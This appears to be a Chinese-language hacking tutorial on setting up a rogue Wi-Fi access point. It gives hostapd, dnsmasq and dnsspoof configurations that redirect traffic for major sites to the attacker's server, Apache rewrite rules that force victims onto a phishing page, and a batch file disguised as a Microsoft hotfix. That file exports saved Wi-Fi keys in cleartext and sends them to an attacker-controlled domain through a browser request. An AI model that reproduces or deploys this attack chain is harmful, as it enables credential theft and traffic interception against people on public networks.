导语:五步教你搭建一个Fake AP。
使用的工具:
· hostapd(或airbase-ng)
· dnsmasq(或isc-dhcp-server)
· Apache2
· Nano或Vim
· grep
简介
Hostapd
要创建一个特定类型的接入点,无论是开放,WPA2个人,企业或业力攻击。
dnsmasq
轻量级DNS / DHCP服务器。它用于从机器中解析dns请求,还可以作为DHCP服务器为客户端分配IP地址。
Apache
作为客户端(受害者)的Web服务器。
可能使用apache的灵活性和特性的高级技术
注意:所有命令都以root身份执行。使用sudo,如果你是非root用户(标准用户)
安装:
确保安装了最新版本的工具:
apt update apt install hostapd dnsmasq apache2
现在创建一个保存所有配置文件的目录
cd ~/Desktop mkdir fakeap/
配置hostapd:
为保存的配置文件创建一个目录。打开终端并创建hostapd配置文件。
nano hostapd.conf interface=<Your Fake AP interface> driver=nl80211 ssid=<Desired AP Name> hw_mode=g channel=<Target AP Channel number> macaddr_acl=0 auth_algs=1 ignore_broadcast_ssid=0
配置dnsmasq:
interface=<Fake AP Interface name> # wlan0 with hostapd, at0 with airbase-ng dhcp-range=10.0.0.10,10.0.0.250,255.255.255.0,12h dhcp-option=3,10.0.0.1 dhcp-option=6,10.0.0.1 server=8.8.8.8 log-queries log-dhcp listen-address=127.0.0.1
参数解释:
dhcp-range=10.0.0.10,10.0.0.250,12h: Client IP address will range from 10.0.0.10 to 10.0.0.250, Network subnet mask is 255.255.255.0 And default lease time is 12 hours.
dhcp-option=3,10.0.0.1: 3 is code for Default Gateway followed by IP of D.G i.e. 10.0.0.1
dhcp-option=6,10.0.0.1: 6 for DNS Server followed by IP address
第1步:启动伪AP
首先,杀死可能已经运行的麻烦的进程。
killall network-manager dnsmasq wpa_supplicant dhcpd
启动hostapd
hostapd /path/to/configuration/file.conf
第2步:启动dhcp服务器
在调试模式下,使用配置文件运行dnsmasq
语法:
dnsmasq -C /path/to/configuration/file.conf -d dnsmasq - C dnsmasq .conf - d
可选配置
您可以为dnsmasq创建一个可选的fakehosts.conf文件,以便将目标网站流量重定向到所需的IP地址。它只会告诉客户target-site.com托管在我们的目标IP地址上。
vi fakehosts .conf 10.0.0.1 apple.com 10.0.0.1 google.com 10.0.0.1 android.clients.google.com 10.0.0.1 microsoft.com 10.0.0.1 android.com 10.0.0.1 apple.com 10.0.0.1 google.com 10.0.0.1 android.clients.google.com 10.0.0.1 microsoft.com 10.0.0.1 android.com
就这样。只需将带-H标志的文件传递给dnsmasq,并且这些站点的所有流量将会如果您希望攻击者针对某个网站或特定客户端,还可以包含fakehosts.conf以通过-H标志传递dns欺骗
dnsmasq - C dnsmasq .conf - H fakehosts .conf - d
第3步:配置apache2 webserver
Apache的Rewrite Engine允许我们随时操作Web请求。使用这种技术,我们可以与我们的受害者一起做一些东西。无论是Android,iOS设备,Windows计算机还是Mac。您可以设计您的apache网络服务器专门针对目标进行攻击,甚至可以定位到特定的操作系统版本。
酷,对吧?
为iOS 9.x客户端提供不同的攻击媒介,并针对iOS 10客户端进行不同的攻击 它只是工作!
在这里,我们的目标是Windows机器,因为它拥有最广泛的安装基础。所以,一个非常普遍的目标Windows是一个黑客。
编辑apache默认配置文件以配置重写功能。这将几乎任何包含子目录的URL重定向到我们的假AP页面。
打开apache的默认配置文件
nano /etc/apache2/sites-enabled/000-default
并在->添加到<directory>标签</ directory>之间的文件中输入行 。
请注意,我们正在添加一个名为/Fixit的目录作为例外。这是区分大小写的
<Directory /var/www/> Options Indexes FollowSymLinks MultiViews AllowOverride None Order allow,deny allow from all --> add RewriteEngine On --> add RewriteCond %{REQUEST_URI} !^/Fixit --> add RewriteRule ^.*$ /Fixit/ </Directory>
使用您的社会工程技能,并制作网页来吸引用户下载并执行您的payload。您需要将index.html文件放在/var/www/html/Fixit/
启用mod_rewrite模块
a2enmod rewrite
您必须重新启动apache2才能更新配置。
service apache2 restart
第4步:向apache发出DNS请求
运行dnsspoof将简单地将所有HTTP(非HTTPS)请求重定向到我们的apache服务器,并且不会让受害者访问Internet(如果禁用IP转发)。
如果您在互联网访问的同时攻击目标域名,这可能不会有用。在这种情况下,请使用带dnsmasq的fakehosts.conf文件
但是现在我们没有提供互联网接入受害者,而是全部都是pwn'em。所以运行:
dnsspoof - i wlan0
第5步:钓鱼攻击
由于我们先前已经配置了DNS,域名解析都会解析到本地。Apache中的index.html下载链接指向我的自定义文件,如Microsoft-Windows-Hotfix.bat。这个批处理文件不会过于复杂,它不会被杀毒软件杀掉。
@echo off SET mypath=%~dp0 netsh wlan export profile > nul netsh wlan export profile key=clear > nul setlocal enableextensions enabledelayedexpansion set /a counter=0 set filecontent= for %%b in (*.xml) do ( set /a counter=!counter! + 1 :: echo %%b for /f "delims=" %%a in ('type "%mypath%%%b"') do ( set filecontent=!filecontent!%%a ) ) echo !filecontent! > %filename%data.txt @rem The next line is platform specific. Sometimes in a diff folder "c:Program FilesInternet Exploreriexplore.exe" microsoftfix.com/"!filecontent!"
一旦受害者执行恶意的Wi-Fi密钥嗅探器,它将提取和解密WLAN配置文件,在受害者设备上打开Internet Explorer,并请求microsoftfix.com(我们的服务器),在URL传输中包含Wi-Fi密钥,请求之后存储在我们的apache日志(/var/logs/apache2/access.log)
结语
这个攻击比较粗糙,一点也不隐蔽,更隐蔽的方法在https://gumroad.com/l/nGMWf